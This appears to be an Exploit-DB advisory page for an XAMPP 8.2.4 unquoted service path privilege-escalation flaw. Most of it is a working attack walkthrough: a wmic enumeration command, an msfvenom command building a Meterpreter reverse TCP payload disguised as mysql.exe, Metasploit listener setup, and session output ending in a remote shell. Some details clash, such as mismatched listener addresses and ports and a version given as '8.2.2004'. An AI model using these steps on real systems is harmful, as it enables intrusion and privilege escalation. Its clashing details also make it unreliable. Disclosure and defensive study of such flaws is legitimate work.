XAMPP 8.2.4 - Unquoted Path

vendor:

XAMPP

by:

Andrey Stoykov

6.7

CVSS

MEDIUM

Unquoted Path

428

CWE

Product Name: XAMPP

Affected Version From: 8.2.2004

Affected Version To: 8.2.2004

Patch Exists: NO

Related CWE:

CPE: a:xampp:xampp:8.2.4

Metasploit:

Other Scripts:

Platforms Tested: Windows Server 2022

2023

XAMPP 8.2.4 – Unquoted Path

The XAMPP version 8.2.4 is vulnerable to an unquoted path vulnerability. This vulnerability allows an attacker to escalate their privileges by replacing a legitimate executable file with a malicious one. By exploiting this vulnerability, an attacker can execute arbitrary code with elevated privileges.

Mitigation:

To mitigate this vulnerability, it is recommended to install the latest version of XAMPP and ensure that all file paths are properly quoted. Additionally, regular security audits should be performed to identify and remediate any unquoted path vulnerabilities.

Source

Exploit-DB raw data:

# Exploit Title: XAMPP 8.2.4 - Unquoted Path
# Date: 07/2023
# Exploit Author: Andrey Stoykov
# Version: 8.2.4
# Software Link: https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/8.2.4/xampp-windows-x64-8.2.4-0-VS16-installer.exe
# Tested on: Windows Server 2022
# Blog: http://msecureltd.blogspot.com/


Steps to Exploit:

1. Search for unquoted paths
2. Generate meterpreter shell
3. Copy shell to XAMPP directory replacing "mysql.exe"
4. Exploit by double clicking on shell


C:\Users\astoykov>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """

mysql                                                                               mysql                                     C:\xampp\mysql\bin\mysqld.exe --defaults-file=c:\xampp\mysql\bin\my.ini mysql            Auto



// Generate shell
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.16 lport=4444 -f exe -o mysql.exe 


// Setup listener
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set lhost 192.168.1.13
msf6 exploit(multi/handler) > set lport 4443
msf6 exploit(multi/handler) > set payload meterpreter/reverse_tcp
msf6 exploit(multi/handler) > run


msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.1.13:4443 
[*] Sending stage (175686 bytes) to 192.168.1.11
[*] Meterpreter session 1 opened (192.168.1.13:4443 -> 192.168.1.11:49686) at 2023-07-08 03:59:40 -0700


meterpreter > getuid
Server username: WIN-5PT4K404NLO\astoykov
meterpreter > getpid
Current pid: 4724
meterpreter > shell
Process 5884 created.
Channel 1 created.
Microsoft Windows [Version 10.0.20348.1]
(c) Microsoft Corporation. All rights reserved.
[...]
C:\xampp\mysql\bin>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 80B5-B405

 Directory of C:\xampp\mysql\bin
[...]